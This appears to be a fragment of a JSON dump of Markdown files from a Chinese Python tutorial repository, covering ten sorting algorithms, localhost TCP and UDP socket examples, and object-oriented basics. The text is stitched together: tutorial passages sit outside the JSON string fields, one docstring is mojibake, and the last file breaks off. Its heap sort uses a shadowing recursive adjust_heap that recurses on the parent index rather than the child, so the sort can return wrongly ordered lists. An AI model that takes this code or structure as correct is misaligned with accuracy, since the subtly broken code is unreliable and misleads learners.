"text": "## 一文学会Python十大排序算法\n\n> 本文已在个人Github开源项目:[PythonGuide](https://github.com/hellgoddess/PythonGuide)中收录,其中包含Python各个方向的自学编程路线、面试题集合/面经及系列技术文章等,并且不断收集了上百本著名的计算机书籍pdf版本,会不断的更新与完善开源项目...\n>\n> 本文作者:海森堡\n\n\n\n> 关键术语说明\n\n- **稳定** :如果a原本在b前面,而a=b,排序之后a仍然在b的前面;\n- **不稳定** :如果a原本在b的前面,而a=b,排序之后a可能会出现在b的后面;\n- **内排序** :所有排序操作都在内存中完成;\n- **外排序** :由于数据太大,因此把数据放在磁盘中,而排序通过磁盘和内存的数据传输才能进行;\n- **时间复杂度** : 一个算法执行所耗费的时间。\n- **空间复杂度** :运行完一个程序所需内存的大小。\n\n\n\n### 1.冒泡排序(Bubble Sort)\n\n冒泡排序时针对**相邻元素之间**的比较,可以将大的数慢慢“沉底”(数组尾部)\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef bubble_sort(alist):\n \"\"\"冒泡排序\"\"\"\n n = len(alist)\n for j in range(0, n-1):\n count = 0 # 优化排序\n for i in range(0, n-1-j):\n # 班长从头走到尾\n if alist[i] > alist[i+1]:\n alist[i], alist[i+1] = alist[i+1], alist[i]\n count += 1\n if 0 == count:\n break\n\nif __name__ == '__main__':\n li = [9, 8, 7, 6, 2, 3, 4, 1]\n print(li)\n bubble_sort(li)\n print(li)\n```\n\n## 2.选择排序(Selection Sort)\n\n **选择排序(Selection-sort)** 是一种简单直观的排序算法。它的工作原理:首先在未排序序列中找到最小(大)元素,存放到排序序列的起始位置,然后,再从剩余未排序元素中继续寻找最小(大)元素,然后放到已排序序列的末尾。以此类推,直到所有元素均排序完毕。\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef select_sort(alist):\n \"\"\"ιζ©ζεΊ\"\"\"\n n = len(alist)\n for j in range(n-1):\n min_index = j\n for i in range(j+1, n):\n if alist[min_index] > alist[i]:\n min_index = i\n alist[j], alist[min_index] = alist[min_index], alist[j]\n```\n\n## 3.插入排序(Insertion Sort)\n\n **插入排序(Insertion-Sort)** 的算法描述是一种简单直观的排序算法。它的工作原理是通过构建有序序列,对于未排序数据,在已排序序列中从后向前扫描,找到相应位置并插入。插入排序在实现上,通常采用in-place排序(即只需用到O(1)的额外空间的排序),因而在从后向前扫描过程中,需要反复把已排序元素逐步向后挪位,为最新元素提供插入空间。\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef insertSort(relist):\n len_ = len(relist)\n for i in range(1, len_):\n for j in range(i):\n if relist[i] < relist[j]:\n relist.insert(j,relist[i])\n relist.pop(i+1)\n break\n return relist\n\na = [9,8,7,6,5,4,3,2,1]\nprint(insertSort(a))\n```\n\n## 4.希尔排序(Shell Sort)\n\n**希尔排序是希尔(Donald Shell)** 于1959年提出的一种排序算法。希尔排序也是一种插入排序,它是简单插入排序经过改进之后的一个更高效的版本,也称为缩小增量排序,同时该算法是冲破O(n2)的第一批算法之一。它与插入排序的不同之处在于,它会优先比较距离较远的元素。希尔排序又叫缩小增量排序。\n\n 希尔排序是把记录按下表的一定增量分组,对每组使用直接插入排序算法排序;随着增量逐渐减少,每组包含的关键词越来越多,当增量减至1时,整个文件恰被分成一组,算法便终止。\n\n\n\n```python\ndef shell_sort(nums):\n n = len(nums)\n gap = n // 2\n while gap:\n for i in range(gap, n):\n while i - gap >= 0 and nums[i - gap] > nums[i]:\n nums[i - gap], nums[i] = nums[i], nums[i - gap]\n i -= gap\n gap //= 2\n return nums\n\n```\n\n\n\n## 5. 
归并排序(Merge Sort)\n\n **归并排序** 是建立在归并操作上的一种有效的排序算法。该算法是采用分治法(Divide and Conquer)的一个非常典型的应用。归并排序是一种稳定的排序方法。将已有序的子序列合并,得到完全有序的序列;即先使每个子序列有序,再使子序列段间有序。若将两个有序表合并成一个有序表,称为2-路归并。\n\n\n\n```python\n#-*-coding:utf-8-*-\ndef merge(left, right):\n result = []\n while left and right:\n result.append(left.pop(0) if left[0] <= right[0] else right.pop(0))\n while left:\n result.append(left.pop(0))\n while right:\n result.append(right.pop(0))\n return result\n\ndef mergeSort(relist):\n if len(relist) <= 1:\n return relist\n mid_index = len(relist)//2\n left = mergeSort(relist[:mid_index])\n right = mergeSort(relist[mid_index:])\n return merge(left, right)\n\nprint(mergeSort([9,8,7,6,5,4]))\n```\n\n## 6.快速排序\n\n **快速排序** 的基本思想:通过一趟排序将待排记录分隔成独立的两部分,其中一部分记录的关键字均比另一部分的关键字小,则可分别对这两部分记录继续进行排序,以达到整个序列有序。\n\n\n\n一\n\n```python\n#-*-coding:utf-8-*-\ndef quick_sort(alist, first, last):\n \"\"\"快速排序\"\"\"\n if first >= last:\n return\n mid_value = alist[first]\n low = first\n high = last\n while low < high:\n while low < high and alist[high] >= mid_value:\n high -= 1\n alist[low] = alist[high]\n\n while low < high and alist[low] < mid_value:\n low += 1\n alist[high] = alist[low]\n # 从循环退出时,low == high\n alist[low] = mid_value\n # 对low左边的列表执行快速排序\n quick_sort(alist, first, low-1)\n # 对low右边的列表执行快速排序\n quick_sort(alist, low+1, last)\n\n\nif __name__ == '__main__':\n li = [0, 6, 7, 9, 8, 6, 2, 3, 1, 4, 5]\n print(li)\n quick_sort(li, 0, len(li)-1)\n print(li)\n```\n\n二:\n\n```python\n#-*-coding:utf-8-*-\ndef quick_sort(nums):\n if not nums:\n return []\n div = nums[0]\n left = quick_sort([l for l in nums[1:] if l <= div])\n right = quick_sort([r for r in nums[1:] if r > div])\n return left + [div] + right\n```\n\n## 7.堆排序(Heap Sort)\n\n **堆排序(Heapsort)** 是指利用堆这种数据结构所设计的一种排序算法。堆积是一个近似完全二叉树的结构,并同时满足堆积的性质:即子结点的键值或索引总是小于(或者大于)它的父节点。\n\n\n\n```python\ndef heap_sort(nums):\n # 调整堆\n # 迭代写法\n def adjust_heap(nums, startpos, endpos):\n newitem = nums[startpos]\n pos = startpos\n childpos = pos * 2 + 1\n while childpos < endpos:\n rightpos = childpos + 1\n if rightpos < endpos and nums[rightpos] >= nums[childpos]:\n childpos = rightpos\n if newitem < nums[childpos]:\n nums[pos] = nums[childpos]\n pos = childpos\n childpos = pos * 2 + 1\n else:\n break\n nums[pos] = newitem\n \n # 递归写法\n def adjust_heap(nums, startpos, endpos):\n pos = startpos\n chilidpos = pos * 2 + 1\n if chilidpos < endpos:\n rightpos = chilidpos + 1\n if rightpos < endpos and nums[rightpos] > nums[chilidpos]:\n chilidpos = rightpos\n if nums[chilidpos] > nums[pos]:\n nums[pos], nums[chilidpos] = nums[chilidpos], nums[pos]\n adjust_heap(nums, pos, endpos)\n\n n = len(nums)\n # 建堆\n for i in reversed(range(n // 2)):\n adjust_heap(nums, i, n)\n # 调整堆\n for i in range(n - 1, -1, -1):\n nums[0], nums[i] = nums[i], nums[0]\n adjust_heap(nums, 0, i)\n return nums\n\n```\n\n## 8.计数排序(Counting Sort)\n\n **计数排序** 的核心在于将输入的数据值转化为键存储在额外开辟的数组空间中。 作为一种线性时间复杂度的排序,计数排序要求输入的数据必须是有确定范围的整数。\n\n\n\n```python\ndef counting_sort(nums):\n if not nums: return []\n n = len(nums)\n _min = min(nums)\n _max = max(nums)\n tmp_arr = [0] * (_max - _min + 1)\n for num in nums:\n tmp_arr[num - _min] += 1\n j = 0\n for i in range(n):\n while tmp_arr[j] == 0:\n j += 1\n nums[i] = j + _min\n tmp_arr[j] -= 1\n return nums\n\n```\n\n## 9.桶排序(Bucket Sort)\n\n桶排序是计数排序的升级版,原理是:输入数据服从均匀分布的,将数据分到有限数量的桶里,每个桶再分别排序(有可能再使用别的算法或是以递归方式继续使用桶排序,此文编码采用递归方式)\n\n算法描述:\n\n人为设置一个桶的BucketSize,作为每个桶放置多少个不同数值(意思就是BucketSize = 5,可以放5个不同数字比如[1, 2, 3,4,5]也可以放 
100000个3,只是表示该桶能存几个不同的数值)\n遍历待排序数据,并且把数据一个一个放到对应的桶里去\n对每个不是桶进行排序,可以使用其他排序方法,也递归排序\n不是空的桶里数据拼接起来\n\n```python\ndef bucket_sort(nums, bucketSize):\n if len(nums) < 2:\n return nums\n _min = min(nums)\n _max = max(nums)\n # 需要桶个数\n bucketNum = (_max - _min) // bucketSize + 1\n buckets = [[] for _ in range(bucketNum)]\n for num in nums:\n # 放入相应的桶中\n buckets[(num - _min) // bucketSize].append(num)\n res = []\n\n for bucket in buckets:\n if not bucket: continue\n if bucketSize == 1:\n res.extend(bucket)\n else:\n # 当都装在一个桶里,说明桶容量大了\n if bucketNum == 1:\n bucketSize -= 1\n res.extend(bucket_sort(bucket, bucketSize))\n return res\n\n```\n\n## 10.基数排序(Radix Sort)\n\n **基数排序**也是非比较的排序算法,对每一位进行排序,从最低位开始排序,复杂度为O(kn),为数组长度,k为数组中的数的最大的位数;\n\n **基数排序**是按照低位先排序,然后收集;再按照高位排序,然后再收集;依次类推,直到最高位。有时候有些属性是有优先级顺序的,先按低优先级排序,再按高优先级排序。最后的次序就是高优先级高的在前,高优先级相同的低优先级高的在前。基数排序基于分别排序,分别收集,所以是稳定的。\n\n\n\n```python\ndef Radix_sort(nums):\n if not nums: return []\n _max = max(nums)\n # 最大位数\n maxDigit = len(str(_max))\n bucketList = [[] for _ in range(10)]\n # 从低位开始排序\n div, mod = 1, 10\n for i in range(maxDigit):\n for num in nums:\n bucketList[num % mod // div].append(num)\n div *= 10\n mod *= 10\n idx = 0\n for j in range(10):\n for item in bucketList[j]:\n nums[idx] = item\n idx += 1\n bucketList[j] = []\n return nums\n\n```\n\n参考文章:https://blog.csdn.net/MobiusStrip/article/details/83785159?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task\n\n"
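学完上面的实现后,可以用下面的小脚本做一个简单的正确性自查(这里只演示几个"返回新列表"的实现:mergeSort、第二版 quick_sort、counting_sort、Radix_sort;bubble_sort、select_sort 等原地排序的版本需要先调用再比较原列表,bucket_sort 还要额外传入 bucketSize):

```python
import random

if __name__ == '__main__':
    for sort_fn in (mergeSort, quick_sort, counting_sort, Radix_sort):
        nums = [random.randint(0, 999) for _ in range(100)]
        # 传入副本,避免原地修改影响对照用的原始数据
        assert sort_fn(list(nums)) == sorted(nums), sort_fn.__name__
    print('所有实现的结果都与内置 sorted() 一致')
```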
},
{
"alpha_fraction": 0.5069538950920105,
"alphanum_fraction": 0.5208616256713867,
"avg_line_length": 42.35293960571289,
"blob_id": "292da7682598d40f839bae067818b54ba0c99064",
"content_id": "e91b35c8dd5dde0664e921a8cf136791e4b7ab17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9038,
"license_type": "permissive",
"max_line_length": 216,
"num_lines": 136,
"path": "/Python基础连载/Python网络通信.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:Python网络通信\n\n## Python网络通信-socket编程\n\n- Python网络编程 - 套接字的概念 / socket模块 / socket函数 / 创建TCP服务器 / 创建TCP客户端 / 创建UDP服务器 / 创建UDP客户端 / SocketServer模块\n\n### 套接字\n\n套接字这个词对很多不了解网络编程的人来说显得非常晦涩和陌生,其实说得通俗点,套接字就是一套用[C语言](https://zh.wikipedia.org/wiki/C语言)写成的应用程序开发库,主要用于实现进程间通信和网络编程,在网络应用开发中被广泛使用。在Python中也可以基于套接字来使用传输层提供的传输服务,并基于此开发自己的网络应用。实际开发中使用的套接字可以分为三类:流套接字(TCP套接字)、数据报套接字和原始套接字。\n\nPython的Socket逻辑如下:\n\n\n\n这张逻辑图,是整个socket编程中的重点的重点,你必须将它理解、吃透,然后刻在脑海里,真正成为自己记忆的一部分!很多人说怎么都学不会socket编程,归根到底的原因就是没有“死记硬背”知识点。\n\n在Python中,`import socket`后,用`socket.socket()`方法来创建套接字,语法格式如下:\n\n```\nsk = socket.socket([family[, type[, proto]]])\n```\n\n参数说明:\n\n- family: 套接字家族,可以使`AF_UNIX`或者`AF_INET`。\n- type: 套接字类型,根据是面向连接的还是非连接分为`SOCK_STREAM`或`SOCK_DGRAM`,也就是TCP和UDP的区别。\n- protocol: 一般不填默认为0。\n\n直接socket.socket(),则全部使用默认值。\n\n下面是具体的参数定义:\n\n| socket类型 | 描述 |\n| --------------------- | ------------------------------------------------------------ |\n| socket.AF_UNIX | 只能够用于单一的Unix系统进程间通信 |\n| socket.AF_INET | IPv4 |\n| socket.AF_INET6 | IPv6 |\n| socket.SOCK_STREAM | 流式socket , for TCP |\n| socket.SOCK_DGRAM | 数据报式socket , for UDP |\n| socket.SOCK_RAW | 原始套接字,普通的套接字无法处理ICMP、IGMP等网络报文,而SOCK_RAW可以;其次,SOCK_RAW也可以处理特殊的IPv4报文;此外,利用原始套接字,可以通过IP_HDRINCL套接字选项由用户构造IP头。 |\n| socket.SOCK_SEQPACKET | 可靠的连续数据包服务 |\n| 创建TCP Socket: | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) |\n| 创建UDP Socket: | s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) |\n\n通过`s = socket.socket()`方法,我们可以获得一个socket对象s,也就是通常说的获取了一个“套接字”,该对象具有一下方法:\n\n| 方法 | 描述 |\n| ------------------------------------ | ------------------------------------------------------------ |\n| **服务器端方法** | |\n| **s.bind()** | 绑定地址(host,port)到套接字,在AF_INET下,以元组(host,port)的形式表示地址。 |\n| **s.listen(backlog)** | 开始监听。backlog指定在拒绝连接之前,操作系统可以挂起的最大连接数量。该值至少为1,大部分应用程序设为5就可以了。 |\n| **s.accept()** | 被动接受客户端连接,(阻塞式)等待连接的到来,并返回(conn,address)二元元组,其中conn是一个通信对象,可以用来接收和发送数据。address是连接客户端的地址。 |\n| **客户端方法** | |\n| **s.connect(address)** | 客户端向服务端发起连接。一般address的格式为元组(hostname,port),如果连接出错,返回socket.error错误。 |\n| s.connect_ex() | connect()函数的扩展版本,出错时返回出错码,而不是抛出异常 |\n| **公共方法** | |\n| **s.recv(bufsize)** | 接收数据,数据以bytes类型返回,bufsize指定要接收的最大数据量。 |\n| **s.send()** | 发送数据。返回值是要发送的字节数量。 |\n| **s.sendall()** | 完整发送数据。将数据发送到连接的套接字,但在返回之前会尝试发送所有数据。成功返回None,失败则抛出异常。 |\n| s.recvform() | 接收UDP数据,与recv()类似,但返回值是(data,address)。其中data是包含接收的数据,address是发送数据的套接字地址。 |\n| s.sendto(data,address) | 发送UDP数据,将数据data发送到套接字,address是形式为(ipaddr,port)的元组,指定远程地址。返回值是发送的字节数。 |\n| **s.close()** | 关闭套接字,必须执行。 |\n| s.getpeername() | 返回连接套接字的远程地址。返回值通常是元组(ipaddr,port)。 |\n| s.getsockname() | 返回套接字自己的地址。通常是一个元组(ipaddr,port) |\n| s.setsockopt(level,optname,value) | 设置给定套接字选项的值。 |\n| s.getsockopt(level,optname[.buflen]) | 返回套接字选项的值。 |\n| s.settimeout(timeout) | 设置套接字操作的超时期,timeout是一个浮点数,单位是秒。值为None表示没有超时期。一般,超时期应该在刚创建套接字时设置,因为它们可能用于连接的操作(如connect()) |\n| s.gettimeout() | 返回当前超时期的值,单位是秒,如果没有设置超时期,则返回None。 |\n| s.fileno() | 返回套接字的文件描述符。 |\n| s.setblocking(flag) | 如果flag为0,则将套接字设为非阻塞模式,否则将套接字设为阻塞模式(默认值)。非阻塞模式下,如果调用recv()没有发现任何数据,或send()调用无法立即发送数据,那么将引起socket.error异常。 |\n| s.makefile() | 创建一个与该套接字相关连的文件 |\n\n**注意事项:**\n\n1. Python3以后,socket传递的都是**bytes类型**的数据,字符串需要先转换一下,`string.encode()`即可;另一端接收到的bytes数据想转换成字符串,只要`bytes.decode()`一下就可以。\n2. 
在正常通信时,`accept()`和`recv()`方法都是阻塞的。所谓的阻塞,指的是程序会暂停在那,一直等到有数据过来。\n\n下面我们通过代码来详细地理解一下:\n\n下面是TCP套接字编程:\n\n服务端:\n\n```python\n#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport socket\n\nip_port = ('127.0.0.1', 8888)\n\nsk = socket.socket()  # 创建套接字\nsk.bind(ip_port)  # 绑定服务地址\nsk.listen(5)  # 监听连接请求\nprint('启动socket服务,等待客户端连接...')\nconn, address = sk.accept()  # 等待连接,此处自动阻塞\nwhile True:  # 一个死循环,直到客户端发送‘exit’的信号,才关闭连接\n    client_data = conn.recv(1024).decode()  # 接收信息\n    if client_data == \"exit\":  # 判断是否退出连接\n        exit(\"通信结束\")\n    print(\"来自%s的客户端向你发来信息:%s\" % (address, client_data))\n    conn.sendall('服务器已经收到你的信息'.encode())  # 回馈信息给客户端\nconn.close()  # 关闭连接\n```\n\n客户端:\n\n```python\n#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport socket\n\nip_port = ('127.0.0.1', 8888)  # 注意:端口必须与服务端bind的端口一致\n\ns = socket.socket()  # 创建套接字\n\ns.connect(ip_port)  # 连接服务器\n\nwhile True:  # 通过一个死循环不断接收用户输入,并发送给服务器\n    inp = input(\"请输入要发送的信息: \").strip()\n    if not inp:  # 防止输入空信息,导致异常退出\n        continue\n    s.sendall(inp.encode())\n\n    if inp == \"exit\":  # 如果输入的是‘exit’,表示断开连接\n        print(\"结束通信!\")\n        break\n\n    server_reply = s.recv(1024).decode()\n    print(server_reply)\n\ns.close()  # 关闭连接\n```\n\n\n"
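本文开头的提纲里还列了"创建UDP服务器 / 创建UDP客户端",但正文只给出了 TCP 示例;这里补一组最简的 UDP 收发示意。UDP 是无连接的,不需要 listen()/accept(),直接用 recvfrom()/sendto() 收发即可(IP 和端口为示意值):

服务端:

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # 创建UDP套接字
s.bind(('127.0.0.1', 8888))  # 绑定服务地址
print('UDP服务端已启动,等待数据...')
while True:
    data, address = s.recvfrom(1024)  # 同时拿到数据和发送方地址
    print('来自%s的消息:%s' % (address, data.decode()))
    s.sendto('服务端已收到'.encode(), address)  # 按来源地址原路回复
```

客户端:

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto('你好, UDP'.encode(), ('127.0.0.1', 8888))  # 不需要connect,直接发送
reply, _ = s.recvfrom(1024)
print(reply.decode())
s.close()
```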
},
{
"alpha_fraction": 0.5586930513381958,
"alphanum_fraction": 0.6058638691902161,
"avg_line_length": 19.449115753173828,
"blob_id": "aacbac88603be40fa96153960bc77569fa05dc58",
"content_id": "593c48f599706765a10d730661ef2f236db703e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16027,
"license_type": "permissive",
"max_line_length": 181,
"num_lines": 452,
"path": "/Python基础连载/面向对象基础.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:面向对象基础\n\n## 面向对象基础\n\n- 类和对象 - 什么是类 / 什么是对象 / 面向对象其他相关概念\n- 定义类 - 基本结构 / 属性和方法 / 构造器 / 析构器 / __str__方法\n- 创建对象 \n- 面向对象的三大特征 封装 / 继承 / 多态\n\n**这是很多编程语言的一个基础知识,那什么才是面向对象呢?**\n\n要理解面向对象,我们先来看看与面向对象相对应的另外一种程序设计方法:面向过程。\n\n面向过程的编程的基本构成便是“过程”,过程实现的方式就是“函数”,我们通过不同函数来实现不同的功能,并按照程序的执行顺序调用相应的函数,组成一个完整的可以运行的应用程序。我们可以通过把不同的功能在不同的函数中实现或者给函数传递不同的参数来实现不同的功能,这是面向过程中模块化设计的原理。\n\n但是面向过程有很多问题,当我们总是按照教科书上的小例子来学习程序设计时是永远也体会不到面向过程中存在的这些问题的,反而会觉得面向过程更简单,更容易理解。而事实是当我们设计一些大型的应用的时候你将会发现使用面向过程编程是多么的痛苦和无奈,代码极难维护,我们不得不为相似功能设计不同的函数,天长日久,代码量越来越大,函数越来越多,而重复的代码越来越多,噩梦就此产生。\n\n于是乎产生了另外一种设计思想:面向对象,从此程序员发现编程是多么快乐的一件事情。我们可以把现实世界的很多哲学思想或者模型应用于编程,这是计算机的一次伟大的革命。那么究竟何为面向对象?要理解这两个重要的字“对象“,我们首先需要理解一下类和实例:\n\n举一个简单的例子,大家都会下五子棋,我们就以开发一个五子棋的游戏来讲解面向过程和面向对象最本质的区别,在早期以面向过程为主要开发方法时,我们是这样来设计这个游戏的:\n\n1. 开始游戏;\n2. 黑方出子;\n3. 绘制画面;\n4. 判断胜负;\n5. 白方出子;\n6. 绘制画面;\n7. 判断胜负;\n8. 循环2、3、4、5、6、7步;\n9. 输出结果。\n\n最后将每一个步骤作为一个处理函数开发出来,每次运行都调用一遍函数(或者过程)。面向过程最关键的概念就是“过程”,所以程序运行都是一步接一步,从上往下。\n\n而面向对象的设计则是从另外的思路来解决问题。整个五子棋可以分为:\n\n1. 黑白双方:负责出子和悔棋;\n2. 棋盘系统:负责绘制画面;\n3. 规则系统:负责判定诸如犯规、输赢等;\n4. 输入输出系统:负责接收黑白子放的位置信息和输出游戏过程中的相关信息。\n\n这就是面向对象,更强调将程序模块化,我们甚至可以将该程序抽象出来使其适用于五子棋和围棋(它们除了规则不一样以外没有其它区别,那么我们只需要修改规则系统便可轻易支持围棋)。\n\n**再初步理解了什么是面向对象的时候,我们接下来就要去理解一下什么是类,什么是对象**\n\n---\n\n**类** 和 **对象** 是 **面向对象编程的 两个 核心概念**\n\n### 类\n\n+ **类** 是对一群具有 **相同 特征** 或者 **行为** 的事物的一个统称,是抽象的,**不能直接使用**\n + **特征** 被称为 **属性**\n + **行为** 被称为 **方法**\n+ **类** 就相当于制造飞机时的**图纸**,是一个 **模板**,是 **负责创建对象的**\n\n\n\n### 对象\n\n+ **对象** 是 **由类创建出来的一个具体存在**,可以直接使用\n+ 由 **哪一个类** 创建出来的 **对象**,就拥有在 **哪一个类** 中定义的:\n + 属性\n + 方法\n+ **对象** 就相当于用 **图纸** **制造** 的飞机\n\n**在程序开发中,应该先有类,再有对象**\n\n## 类和对象的关系\n\n+ **类是模板**,**对象** 是根据 **类** 这个模板创建出来的,应该 **先有类,再有对象**\n+ **类** 只有一个,而 **对象** 可以有很多个\n + **不同的对象** 之间 **属性** 可能会各不相同\n+ **类** 中定义了什么 **属性和方法**,**对象** 中就有什么属性和方法,**不可能多,也不可能少**\n\n### 定义类\n\n在Python中可以使用`class`关键字定义类,然后在类中通过之前学习过的函数来定义方法,这样就可以将对象的动态特征描述出来,代码如下所示。\n\n```Python\nclass Student(object):\n\n # __init__是一个特殊方法用于在创建对象时进行初始化操作\n # 通过这个方法我们可以为学生对象绑定name和age两个属性\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def study(self, course_name):\n print('%s正在学习%s.' % (self.name, course_name))\n\n \n # 驼峰命名法(驼峰标识)\n def watch_movie(self):\n if self.age < 18:\n print('%s正在看蜡笔小新.' % self.name)\n else:\n print('%s正在观看海贼王' % self.name)\n```\n\n### 创建和使用对象\n\n当我们定义好一个类之后,可以通过下面的方式来创建对象并给对象发消息。\n\n```\ndef main():\n # 创建学生对象并指定姓名和年龄\n stu1 = Student('海森堡', 19)\n # 给对象发study消息\n stu1.study('大话Python')\n # 给对象发watch_av消息\n stu1.watch_movie()\n \n\n\nif __name__ == '__main__':\n main()\n```\n\n## 类的设计\n\n在使用面相对象开发前,应该首先分析需求,确定一下,程序中需要包含哪些类!\n\n\n\n在程序开发中,要设计一个类,通常需要满足一下三个要素:\n\n1. **类名** 这类事物的名字,**满足大驼峰命名法**\n2. **属性** 这类事物具有什么样的特征\n3. **方法** 这类事物具有什么样的行为\n\n### 大驼峰命名法\n\n```\nCapWords\n```\n\n1. 每一个单词的首字母大写\n2. 单词与单词之间没有下划线\n\n### 面向对象的三大特征\n\n面向想有三大特征: 封装,继承,多态,下面我们来了解一下这三大特性。\n\n**什么是封装呢?**\n\n我个人的理解就是,把你的属性隐藏起来,外界不可获取到。我简单的分为四点去理解:\n\n1. **封装** 是面向对象编程的一大特点\n2. 面向对象编程的 **第一步** —— 将 **属性** 和 **方法** **封装** 到一个抽象的 **类** 中\n3. **外界** 使用 **类** 创建 **对象**,然后 **让对象调用方法**\n4. **对象方法的细节** 都被 **封装** 在 **类的内部**\n\n我们通过一个例子来了解一下什么是封装:\n\n**需求**\n\n1. **小明** **体重** `75.0` 公斤\n2. 小明每次 **跑步** 会减肥 `0.5` 公斤\n3. 
小明每次 **吃东西** 体重增加 `1` 公斤\n\n\n\n> 提示:在 **对象的方法内部**,是可以 **直接访问对象的属性** 的!\n\n+ 代码实现\n\n```\nclass Person:\n \"\"\"人类\"\"\"\n“”“封装”“”\n def __init__(self, name, weight):\n\n self.name = name\n self.weight = weight\n\n\"\"\"内置的方法,下一节会讲到\"\"\"\n def __str__(self):\n\n return \"我的名字叫 %s 体重 %.2f 公斤\" % (self.name, self.weight)\n\n def run(self):\n \"\"\"跑步\"\"\"\n\n print(\"%s 爱跑步,跑步锻炼身体\" % self.name)\n self.weight -= 0.5\n\n def eat(self):\n \"\"\"吃东西\"\"\"\n\n print(\"%s 是吃货,吃完这顿再减肥\" % self.name)\n self.weight += 1\n\n\nxiaoming = Person(\"小明\", 75)\n\nxiaoming.run()\nxiaoming.eat()\nxiaoming.eat()\n\nprint(xiaoming)\n```\n\n#### 定义一个类描述数字时钟。\n\n```Python\nfrom time import sleep\n\n\nclass Clock(object):\n \"\"\"数字时钟\"\"\"\n\n def __init__(self, hour=0, minute=0, second=0):\n \"\"\"初始化方法\n\n :param hour: 时\n :param minute: 分\n :param second: 秒\n \"\"\"\n self._hour = hour\n self._minute = minute\n self._second = second\n\n def run(self):\n \"\"\"走字\"\"\"\n self._second += 1\n if self._second == 60:\n self._second = 0\n self._minute += 1\n if self._minute == 60:\n self._minute = 0\n self._hour += 1\n if self._hour == 24:\n self._hour = 0\n\n def show(self):\n \"\"\"显示时间\"\"\"\n return '%02d:%02d:%02d' % \\\n (self._hour, self._minute, self._second)\n\n\ndef main():\n clock = Clock(23, 59, 58)\n while True:\n print(clock.show())\n sleep(1)\n clock.run()\n\n\nif __name__ == '__main__':\n main()\n```\n\n### 继承\n\n继承,从字面意识上理解,就是可以实现从父亲辈继承到一些遗产什么的,而在Python中就是可以继承到一些属性和方法。Python与Java在继承中有一个非常大的区别就是Python支持多继承,而java只支持单继承。\n\n## 单继承\n\n### 继承的概念、语法和特点\n\n**继承的概念**:**子类** 拥有 **父类** 的所有 **方法** 和 **属性**\n\n\n\n#### 1) 继承的语法\n\n```\nclass 类名(父类名):\n\n pass\n```\n\n+ `Dog` 类是 `Animal` 类的**子类**,`Animal` 类是 `Dog` 类的**父类**,`Dog` 类从 `Animal` 类**继承**\n+ `Dog` 类是 `Animal` 类的**派生类**,`Animal` 类是 `Dog` 类的**基类**,`Dog` 类从 `Animal` 类**派生**\n\n#### 2) 专业术语\n\n+ `C` 类从 `B` 类继承,`B` 类又从 `A` 类继承\n+ 那么 `C` 类就具有 `B` 类和 `A` 类的所有属性和方法\n\n### 方法的重写\n\n+ **子类** 拥有 **父类** 的所有 **方法** 和 **属性**\n+ **子类** 继承自 **父类**,可以直接 **享受** 父类中已经封装好的方法,不需要再次开发\n\n**应用场景**\n\n+ 当 **父类** 的方法实现不能满足子类需求时,可以对方法进行 **重写(override)**\n\n\n\n**重写** 父类方法有两种情况:\n\n1. **覆盖** 父类的方法\n2. 对父类方法进行 **扩展**\n\n#### 1) 覆盖父类的方法\n\n+ 如果在开发中,**父类的方法实现** 和 **子类的方法实现**,**完全不同**\n+ 就可以使用 **覆盖** 的方式,**在子类中** **重新编写** 父类的方法实现\n\n> 具体的实现方式,就相当于在 **子类中** 定义了一个 **和父类同名的方法并且实现**\n\n#### 2) 对父类方法进行 **扩展**\n\n+ 如果在开发中,**子类的方法实现** 中 **包含** **父类的方法实现**\n + **父类原本封装的方法实现** 是 **子类方法的一部分**\n+ 就可以使用 **扩展** 的方式\n + **在子类中** **重写** 父类的方法\n + 在需要的位置使用 `super().父类方法` 来调用父类方法的执行\n + 代码其他的位置针对子类的需求,编写 **子类特有的代码实现**\n\n##### 关于 `super`\n\n+ 在 `Python` 中 `super` 是一个 **特殊的类**\n+ `super()` 就是使用 `super` 类创建出来的对象\n+ **最常** 使用的场景就是在 **重写父类方法时**,调用 **在父类中封装的方法实现**\n\n### 父类的 私有属性 和 私有方法\n\n1. **子类对象** **不能** 在自己的方法内部,**直接** 访问 父类的 **私有属性** 或 **私有方法**\n2. 
**子类对象** 可以通过 **父类** 的 **公有方法** **间接** 访问到 **私有属性** 或 **私有方法**\n\n> - **私有属性、方法** 是对象的隐私,不对外公开,**外界** 以及 **子类** 都不能直接访问\n> - **私有属性、方法** 通常用于做一些内部的事情\n\n\n\n- `B` 的对象不能直接访问 `__num2` 属性\n- `B` 的对象不能在 `demo` 方法内访问 `__num2` 属性\n- `B` 的对象可以在 `demo` 方法内,调用父类的 `test` 方法\n- 父类的 `test` 方法内部,能够访问 `__num2` 属性和 `__test` 方法\n\n## 多继承\n\n**概念**\n\n+ **子类** 可以拥有 **多个父类**,并且具有 **所有父类** 的 **属性** 和 **方法**\n+ 例如:**孩子** 会继承自己 **父亲** 和 **母亲** 的 **特性**\n\n\n\n\n\n**语法**\n\n```\nclass 子类名(父类名1, 父类名2...)\n pass\n```\n\n#### Python 中的 MRO —— 方法搜索顺序(了解)\n\n- `Python` 中针对 **类** 提供了一个 **内置属性** `__mro__` 可以查看 **方法** 搜索顺序\n- MRO 是 `method resolution order`,主要用于 **在多继承时判断 方法、属性 的调用 路径**\n\n```\nprint(C.__mro__)\n```\n\n**输出结果**\n\n```\n(<class '__main__.C'>, <class '__main__.A'>, <class '__main__.B'>, <class 'object'>)\n```\n\n- 在搜索方法时,是按照 `__mro__` 的输出结果 **从左至右** 的顺序查找的\n- 